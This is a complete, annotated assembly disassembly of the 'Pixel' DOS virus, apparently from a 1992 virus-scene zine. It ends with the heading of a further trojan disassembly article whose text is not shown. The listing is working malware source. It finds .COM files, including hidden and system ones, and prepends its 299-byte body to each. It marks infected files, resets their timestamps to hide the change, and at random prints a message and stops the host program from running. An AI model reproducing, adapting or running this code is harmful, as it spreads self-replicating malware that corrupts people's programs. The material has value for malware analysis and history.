-
-
- ;*****************************************************************************
-
- ;
-
- ; Pixel - 299 virus
-
- ;
-
- ; Disassembled By Admiral Bailey [YAM '92]
-
- ;
-
- ; Notes: I dont know where the hell I got this one from but when I found it on
-
- ; one of my disks it was named incorrectly. Some Amst shit but I looked
-
- ; it up in the vsum and it's named as Pixel so I'll use that name.
-
- ; Anyways it's just a plain com infecting virus that displays a message
-
- ; when executed. Nothing big.
-
- ;
-
- ;*****************************************************************************
-
-
-
- data_1e equ 6Ch ; offset read with DS=0040h at `quit`: BIOS timer tick count, low word
-
- data_2e equ 96h ; PSP:80h+16h = file-time field of the default DTA (no set-DTA call appears in this listing)
-
- data_3e equ 98h ; PSP:80h+18h = file-date field of the default DTA
-
- data_4e equ 9Eh ; PSP:80h+1Eh = ASCIIZ name of the file returned by find-first/find-next
-
- data_15e equ 12Bh ; 12Bh = 299 = length of the virus body; also the offset of the read buffer in the work segment
-
- data_16e equ 12Dh ; read buffer + 2, i.e. bytes 2-3 of the file just read, compared with the 5649h marker
-
- ; Single-segment .COM program: the code below addresses everything through CS/DS = seg_a.
-
- seg_a segment byte public
-
- assume cs:seg_a, ds:seg_a
-
-
-
-
-
- org 100h ; .COM images are loaded at offset 100h, after the PSP
-
-
-
- Pixel proc far
- ; Start of the 299-byte body. The first two bytes jump over the body's own data;
- ; the word that follows is the marker other copies test for, so an infected
- ; file shows bytes 49h 56h ('IV') at file offset 2.
- start:
-
- jmp short begin ; skip the data words below
-
- dw 5649h ; infection marker, stored as bytes 49h,56h at image offset 102h
-
- data_7 db 0 ; counter: incremented at `begin` before the body is copied, compared with 5 at `quit`
-
- data_8 db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 ; '*.com' - ASCIIZ search pattern with no path component
-
- data_10 dw 0, 8918h ; far-pointer slot (offset, segment); loc_5 overwrites both words before use, so 8918h looks like a leftover value
-
- data_12 dw 0 ; byte count for the write: bytes read from the target + 12Bh
-
-
-
- begin: ; loc_1: set up a work segment, copy the body into it, start the file search
-
- push ax ; keep the entry value of AX; it is popped into BX at loc_5
-
- mov ax,cs
-
- add ax,1000h ; + 1000h paragraphs = the 64 KB segment directly above this one
-
- mov es,ax ; ES = work segment; no allocation or ownership check is visible in this listing
-
- inc data_7 ; bump the counter first, so the copy made below carries the new value
-
- mov si,100h ; source = start of the body in this segment
-
- xor di,di ; destination offset 0 in the work segment
-
- mov cx,12Bh ; 299 bytes = the whole body
-
- rep movsb ; copy DS:[si] to ES:[di]
-
- mov dx,offset data_8 ; DS:DX -> '*.com' pattern
-
- mov cx,6 ; attribute mask 06h = hidden + system, so those files match as well as normal ones
-
- mov ah,4Eh ; Find first file
-
- int 21h ; result is placed in the DTA
-
-
-
- jc quit ; carry set = no match: skip straight to the payload/host-return logic
-
- get_file: ; loc_2: read the matched file, and if it is not yet marked, rewrite it as body + original contents
-
- mov dx,data_4e ; DS:DX -> file name inside the DTA
-
- mov ax,3D02h ; open file, AL=02h = read/write access
-
- int 21h
-
- ; NOTE(review): the carry flag is not tested after the open; on failure AX holds
- ; an error code and the code below would use it as a handle.
- mov bx,ax ; BX = file handle for the calls that follow
-
- push es
-
- pop ds ; DS = work segment
-
- mov dx,data_15e ; buffer at work:12Bh, directly after the copied body
-
- mov cx,0FFFFh ; request up to 0FFFFh bytes
-
- mov ah,3Fh ; read file
-
- int 21h ; AX = number of bytes actually read
-
-
-
- add ax,12Bh ; total = bytes read + 299; 16-bit sum with no overflow check
-
- mov cs:data_12,ax ; remember the total for the write below
-
- cmp word ptr ds:data_16e,5649h ; bytes 2-3 of the file vs. the 5649h marker (a marker test, not a size test)
-
- je not_this_file ; marker present: file is left unchanged
-
- xor cx,cx ; CX:DX = 0 ...
-
- mov dx,cx
-
- mov ax,4200h ; ... seek to the beginning of the file
-
- int 21h
-
-
-
- jc not_this_file ; seek failed: give up on this file
-
- xor dx,dx ; DS:DX = work:0000 = copied body followed by the original contents
-
- mov cx,cs:data_12 ; byte count = 299 + original length
-
- mov ah,40h ; write from offset 0: the body is prepended and the file grows by 299 bytes
-
- int 21h
-
-
-
- mov cx,cs:data_2e ; CX = original file time, taken from the DTA
-
- mov dx,cs:data_3e ; DX = original file date, taken from the DTA
-
- mov ax,5701h ; set file date & time back to the original, so the timestamp does not show the change
-
- int 21h
-
-
-
- not_this_file: ; loc_3: close the current file and move on to the next match
-
- mov ah,3Eh ; close the handle in BX
-
- int 21h
-
-
-
- push cs
-
- pop ds ; DS = CS again; get_file reads the DTA file name through DS
-
- mov ah,4Fh ; find next file matching the earlier pattern
-
- int 21h
-
-
-
- jc quit ; no more matches
-
- jmp short get_file ; another match: process it the same way
-
- quit: ; loc_4: decide between showing the message and returning to the host
-
- cmp data_7,5
-
- jb loc_5 ; counter below 5: no message, go run the host
-
- mov ax,40h
-
- mov ds,ax ; DS = 0040h, the BIOS data area
-
- mov ax,ds:data_1e ; AX = word at 0040:006Ch (timer tick count, low word)
-
- push cs
-
- pop ds ; DS = CS again
-
- and ax,1 ; keep only the lowest tick bit
-
- jz loc_5 ; even tick: no message, so the message appears on roughly half of the runs
-
- mov dx,offset data_13 ; DS:DX -> message text
-
- mov ah,9 ; display '$'-terminated string
-
- int 21h
-
-
-
- int 20h ; terminate here: on this path the host program is never run
-
-
-
- data_13 db 'Program sick error:Call doctor o' ; message text; this literal is present
-
- db 'r buy PIXEL for cure description' ; in every copy and is usable as a
-
- db 0Ah, 0Dh, '$' ; string indicator. LF, CR, '$' terminator
-
- loc_5: ; place the data_14 stub at work:0000 and far-jump into it
-
- mov si,offset data_14
-
- mov cx,22h ; 34 bytes; data_14 holds 36, the trailing CDh 20h pair is not copied
-
- xor di,di ; destination offset 0, overwriting the start of the body copy made at `begin`
-
- rep movsb ; copy DS:[si] to ES:[di] while cx > 0
-
- pop bx ; BX = the AX value pushed at `begin`
-
- mov cs:data_10,0 ; far pointer offset = 0000h
-
- mov word ptr cs:data_10+2,es ; far pointer segment = work segment
-
- jmp dword ptr cs:data_10 ; continue execution at work:0000, i.e. in the copied stub
-
-
-
- data_14 db 1Eh ; push ds
- ; Machine code kept as data: loc_5 copies it to the work segment and runs it there. It moves the original program from offset 22Bh (100h + 12Bh) down to 100h and far-jumps to it.
- db 07h,0BEh, 2Bh, 02h,0BFh, 00h ; pop es / mov si,22Bh / mov di,100h (first two bytes)
-
- db 01h,0B9h,0FFh,0FFh, 2Bh,0CEh ; (last byte of mov di) / mov cx,0FFFFh / sub cx,si
-
- db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h ; rep movsb / mov word ptr cs:[100h],100h (first four bytes)
-
- db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh ; (rest of that mov) / mov cs:[102h],ds (first three bytes)
-
- db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh ; (rest of that mov) / mov ax,bx, restoring the entry AX / jmp dword ptr cs:[100h] (first two bytes)
-
- db 2Eh, 00h, 01h,0CDh ; (rest of the far jmp, to DS:0100h) / first byte of int 20h
-
- db 20h ; second byte of int 20h; not reached, and outside the 22h bytes loc_5 copies
-
-
-
- Pixel endp
-
-
-
- seg_a ends
-
-
-
- end start
-
-
-
-
-
- ─────────═════════>>> Article From Evolution #1 - YAM '92
-
-
-
- Article Title: Thrasher Trojan Disassembly
-
- Author: Natas Kaupas
-
-
-
-
-
-
-
-